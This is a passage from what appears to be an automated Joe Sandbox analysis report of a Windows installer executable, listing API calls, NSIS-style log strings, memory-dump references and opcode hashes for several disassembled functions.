                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(0003A800,00000064,0012C21C), ref: 00403295
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                      • String ID: %02x%c$...
